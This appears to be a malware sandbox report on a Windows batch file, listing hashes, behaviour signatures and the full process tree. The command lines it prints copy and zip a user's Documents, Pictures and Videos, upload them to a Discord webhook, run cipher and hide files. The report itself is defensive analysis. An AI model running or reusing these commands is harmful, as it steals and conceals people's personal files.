24ab7f2a982dc3529357fc068b7c8a936b25bfe29856468d6d2dcaecf31b3384

Analysis

max time kernel
86s
max time network
91s
platform
windows11-21h2_x64
resource
win11-20231215-en
resource tags

arch:x64arch:x86image:win11-20231215-enlocale:en-usos:windows11-21h2-x64system
submitted
30-12-2023 08:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

m.bat
Size

4KB
MD5

2736dca71a20cce10c7a067d7441cf41
SHA1

abf4f7b9ae31689f639e6f2da0639df165610710
SHA256

24ab7f2a982dc3529357fc068b7c8a936b25bfe29856468d6d2dcaecf31b3384
SHA512

71a8ec11e781b148bbfa09ad0409cd3eaa899d2a875bda6f90adfe2853e46fbf5c2fdff5b24f679649165d6c79fbb4903242a76e2e55f31e2ae294c5eb908eb1
SSDEEP

96:YtvqJ7Bticp4rYdHzQZPaDQdlQcGcM0j2MVr+:Ytiti04w2CDal/Z6h

Score

1^/10

Malware Config

Signatures

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
2652	powershell.exe
2652	powershell.exe
3568	powershell.exe
3568	powershell.exe
1968	powershell.exe
1968	powershell.exe
1056	powershell.exe
1056	powershell.exe
2732	powershell.exe
2732	powershell.exe
4824	powershell.exe
4824	powershell.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	2652	powershell.exe
Token: SeDebugPrivilege	3568	powershell.exe
Token: SeDebugPrivilege	1968	powershell.exe
Token: SeDebugPrivilege	1056	powershell.exe
Token: SeDebugPrivilege	2732	powershell.exe
Token: SeDebugPrivilege	4824	powershell.exe

Suspicious use of WriteProcessMemory 44 IoCs

description	pid	Process	procid_target
PID 3992 wrote to memory of 4604	3992	cmd.exe	82
PID 3992 wrote to memory of 4604	3992	cmd.exe	82
PID 3992 wrote to memory of 2128	3992	cmd.exe	83
PID 3992 wrote to memory of 2128	3992	cmd.exe	83
PID 3992 wrote to memory of 3896	3992	cmd.exe	84
PID 3992 wrote to memory of 3896	3992	cmd.exe	84
PID 3992 wrote to memory of 2652	3992	cmd.exe	85
PID 3992 wrote to memory of 2652	3992	cmd.exe	85
PID 3992 wrote to memory of 3568	3992	cmd.exe	86
PID 3992 wrote to memory of 3568	3992	cmd.exe	86
PID 3992 wrote to memory of 1968	3992	cmd.exe	87
PID 3992 wrote to memory of 1968	3992	cmd.exe	87
PID 3992 wrote to memory of 1056	3992	cmd.exe	88
PID 3992 wrote to memory of 1056	3992	cmd.exe	88
PID 3992 wrote to memory of 2732	3992	cmd.exe	89
PID 3992 wrote to memory of 2732	3992	cmd.exe	89
PID 3992 wrote to memory of 4824	3992	cmd.exe	90
PID 3992 wrote to memory of 4824	3992	cmd.exe	90
PID 3992 wrote to memory of 3800	3992	cmd.exe	103
PID 3992 wrote to memory of 3800	3992	cmd.exe	103
PID 3992 wrote to memory of 2000	3992	cmd.exe	102
PID 3992 wrote to memory of 2000	3992	cmd.exe	102
PID 3992 wrote to memory of 1168	3992	cmd.exe	101
PID 3992 wrote to memory of 1168	3992	cmd.exe	101
PID 3992 wrote to memory of 3968	3992	cmd.exe	100
PID 3992 wrote to memory of 3968	3992	cmd.exe	100
PID 3992 wrote to memory of 2752	3992	cmd.exe	91
PID 3992 wrote to memory of 2752	3992	cmd.exe	91
PID 3992 wrote to memory of 1720	3992	cmd.exe	99
PID 3992 wrote to memory of 1720	3992	cmd.exe	99
PID 3992 wrote to memory of 1996	3992	cmd.exe	98
PID 3992 wrote to memory of 1996	3992	cmd.exe	98
PID 3992 wrote to memory of 3960	3992	cmd.exe	97
PID 3992 wrote to memory of 3960	3992	cmd.exe	97
PID 3992 wrote to memory of 2776	3992	cmd.exe	92
PID 3992 wrote to memory of 2776	3992	cmd.exe	92
PID 3992 wrote to memory of 4144	3992	cmd.exe	96
PID 3992 wrote to memory of 4144	3992	cmd.exe	96
PID 3992 wrote to memory of 3096	3992	cmd.exe	95
PID 3992 wrote to memory of 3096	3992	cmd.exe	95
PID 3992 wrote to memory of 4616	3992	cmd.exe	94
PID 3992 wrote to memory of 4616	3992	cmd.exe	94
PID 3992 wrote to memory of 4332	3992	cmd.exe	93
PID 3992 wrote to memory of 4332	3992	cmd.exe	93

Views/modifies file attributes 1 TTPs 7 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4616	attrib.exe
4144	attrib.exe
3960	attrib.exe
1720	attrib.exe
3968	attrib.exe
2000	attrib.exe
3800	attrib.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\m.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3992
- C:\Windows\system32\xcopy.exe
  xcopy /s /e /i "C:\Users\Admin\Documents" "C:\Temp\Documents"
  2⤵
  PID:4604
- C:\Windows\system32\xcopy.exe
  xcopy /s /e /i "C:\Users\Admin\Pictures" "C:\Temp\Pictures"
  2⤵
  PID:2128
- C:\Windows\system32\xcopy.exe
  xcopy /s /e /i "C:\Users\Admin\Videos" "C:\Temp\Videos"
  2⤵
  PID:3896
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -c "Compress-Archive -Path 'C:\Temp\Documents' -DestinationPath 'C:\Temp\Documents.zip' -CompressionLevel Optimal -CompressionMethod Deflate -Force"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2652
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -c "Compress-Archive -Path 'C:\Temp\Pictures' -DestinationPath 'C:\Temp\Pictures.zip' -CompressionLevel Optimal -CompressionMethod Deflate -Force"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3568
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -c "Compress-Archive -Path 'C:\Temp\Videos' -DestinationPath 'C:\Temp\Videos.zip' -CompressionLevel Optimal -CompressionMethod Deflate -Force"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1968
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -c "(New-Object System.Net.WebClient).UploadFile(https://discord.com/api/webhooks/1173503461527138387/boCId92Xg8rKyOQmvFeKgUh3Aa93BI5uvIg1RwOkEtlpbZZkICdaqfRTyqcdCWLg57VU', 'C:\Temp\Documents.zip')"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1056
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -c "(New-Object System.Net.WebClient).UploadFile('https://discord.com/api/webhooks/1173503461527138387/boCId92Xg8rKyOQmvFeKgUh3Aa93BI5uvIg1RwOkEtlpbZZkICdaqfRTyqcdCWLg57VU', 'C:\Temp\Pictures.zip')"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2732
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -c "(New-Object System.Net.WebClient).UploadFile('https://discord.com/api/webhooks/1173503461527138387/boCId92Xg8rKyOQmvFeKgUh3Aa93BI5uvIg1RwOkEtlpbZZkICdaqfRTyqcdCWLg57VU', 'C:\Temp\Videos.zip')"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4824
- C:\Windows\system32\cipher.exe
  cipher /e /s /a
  2⤵
  PID:2752
- C:\Windows\system32\cipher.exe
  cipher /e /s /a
  2⤵
  PID:2776
- C:\Windows\system32\cipher.exe
  cipher /e /s /a
  2⤵
  PID:4332
- C:\Windows\system32\attrib.exe
  attrib +h /s /d
  2⤵
  - Views/modifies file attributes
  PID:4616
- C:\Windows\system32\cipher.exe
  cipher /e /s /a
  2⤵
  PID:3096
- C:\Windows\system32\attrib.exe
  attrib +h /s /d
  2⤵
  - Views/modifies file attributes
  PID:4144
- C:\Windows\system32\attrib.exe
  attrib +h /s /d
  2⤵
  - Views/modifies file attributes
  PID:3960
- C:\Windows\system32\cipher.exe
  cipher /e /s /a
  2⤵
  PID:1996
- C:\Windows\system32\attrib.exe
  attrib +h /s /d
  2⤵
  - Views/modifies file attributes
  PID:1720
- C:\Windows\system32\attrib.exe
  attrib +h /s /d
  2⤵
  - Views/modifies file attributes
  PID:3968
- C:\Windows\system32\cipher.exe
  cipher /e /s /a
  2⤵
  PID:1168
- C:\Windows\system32\attrib.exe
  attrib +h /s /d
  2⤵
  - Views/modifies file attributes
  PID:2000
- C:\Windows\system32\attrib.exe
  attrib +h C:\Users\Admin\AppData\Local\Temp\m.bat
  2⤵
  - Views/modifies file attributes
  PID:3800

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
33e06e46cc090ed74060bf3cbbc07df6

SHA1
573622d3856a91ce81d1dfcd7ad3ad12da39cf38

SHA256
c439a8860309d22efc4777e1e235db60b050e950888c7c57191df5fc3973534b

SHA512
cd7eebce72015c333e1dc70c09f71a91e023994fae3ff087a8f7d538a045c5a7207ef944d36719a2d05910862d13416158e49dcc2a537ba398ce183bbae25076

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7dfe61f19103f7ee23e19e85678a94d3

SHA1
031dadccca4e89578f5c075bb546ea36d6f3affc

SHA256
4b37a9c91324034de849b185f267416483a1ed91955616ff8490233accb5d691

SHA512
1743bc2920e1bfa88b1338ad22bb550aedbaf0102ef1ef266de7a62eafa98f51e49213b914ee9e2b152177584e1157cdc4c3252f5f7ff65beab5cc51e7b212c2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
123ca8655ca3e15f2ec718b15f9e4a12

SHA1
0a44d46118af8f54dd8785f41bfb14200daf1565

SHA256
3a8834bdbf572fcd656cad2dd0cb394c651a5468052cecc45f20ed69d4586ef9

SHA512
8677f095bcfec30453f23ed1dd7f6ff0931d67c65192578b2558becdcec693707423fac9fdeafedf0433dfa692c7496b78d4fa6d2c09333e4858838ae34bde79

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fecnsunh.le2.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1056-228-0x0000024B56B70000-0x0000024B56B80000-memory.dmp

Filesize
64KB

Download
memory/1056-227-0x0000024B56B70000-0x0000024B56B80000-memory.dmp

Filesize
64KB

Download
memory/1056-226-0x0000024B56B70000-0x0000024B56B80000-memory.dmp

Filesize
64KB

Download
memory/1056-225-0x0000024B56B70000-0x0000024B56B80000-memory.dmp

Filesize
64KB

Download
memory/1056-224-0x00007FFC146E0000-0x00007FFC151A2000-memory.dmp

Filesize
10.8MB

Download
memory/1056-230-0x00007FFC146E0000-0x00007FFC151A2000-memory.dmp

Filesize
10.8MB

Download
memory/1968-212-0x00000208B6CE0000-0x00000208B6CF0000-memory.dmp

Filesize
64KB

Download
memory/1968-209-0x00007FFC146E0000-0x00007FFC151A2000-memory.dmp

Filesize
10.8MB

Download
memory/1968-211-0x00000208B6CE0000-0x00000208B6CF0000-memory.dmp

Filesize
64KB

Download
memory/1968-210-0x00000208B6CE0000-0x00000208B6CF0000-memory.dmp

Filesize
64KB

Download
memory/1968-214-0x00007FFC146E0000-0x00007FFC151A2000-memory.dmp

Filesize
10.8MB

Download
memory/2652-183-0x00007FFC146E0000-0x00007FFC151A2000-memory.dmp

Filesize
10.8MB

Download
memory/2652-179-0x000001B849D40000-0x000001B849D50000-memory.dmp

Filesize
64KB

Download
memory/2652-180-0x000001B849D40000-0x000001B849D50000-memory.dmp

Filesize
64KB

Download
memory/2652-178-0x000001B849D40000-0x000001B849D50000-memory.dmp

Filesize
64KB

Download
memory/2652-177-0x00007FFC146E0000-0x00007FFC151A2000-memory.dmp

Filesize
10.8MB

Download
memory/2652-176-0x000001B831BC0000-0x000001B831BE2000-memory.dmp

Filesize
136KB

Download
memory/2732-242-0x00000230F0E30000-0x00000230F0E40000-memory.dmp

Filesize
64KB

Download
memory/2732-243-0x00000230F0E30000-0x00000230F0E40000-memory.dmp

Filesize
64KB

Download
memory/2732-240-0x00007FFC146E0000-0x00007FFC151A2000-memory.dmp

Filesize
10.8MB

Download
memory/2732-245-0x00007FFC146E0000-0x00007FFC151A2000-memory.dmp

Filesize
10.8MB

Download
memory/2732-241-0x00000230F0E30000-0x00000230F0E40000-memory.dmp

Filesize
64KB

Download
memory/3568-197-0x000001F977790000-0x000001F9777A0000-memory.dmp

Filesize
64KB

Download
memory/3568-194-0x00007FFC146E0000-0x00007FFC151A2000-memory.dmp

Filesize
10.8MB

Download
memory/3568-199-0x00007FFC146E0000-0x00007FFC151A2000-memory.dmp

Filesize
10.8MB

Download
memory/3568-196-0x000001F977790000-0x000001F9777A0000-memory.dmp

Filesize
64KB

Download
memory/3568-195-0x000001F977790000-0x000001F9777A0000-memory.dmp

Filesize
64KB

Download
memory/4824-255-0x00007FFC146E0000-0x00007FFC151A2000-memory.dmp

Filesize
10.8MB

Download
memory/4824-256-0x00000149C1810000-0x00000149C1820000-memory.dmp

Filesize
64KB

Download
memory/4824-258-0x00000149C1810000-0x00000149C1820000-memory.dmp

Filesize
64KB

Download
memory/4824-257-0x00000149C1810000-0x00000149C1820000-memory.dmp

Filesize
64KB

Download
memory/4824-260-0x00007FFC146E0000-0x00007FFC151A2000-memory.dmp

Filesize
10.8MB

Download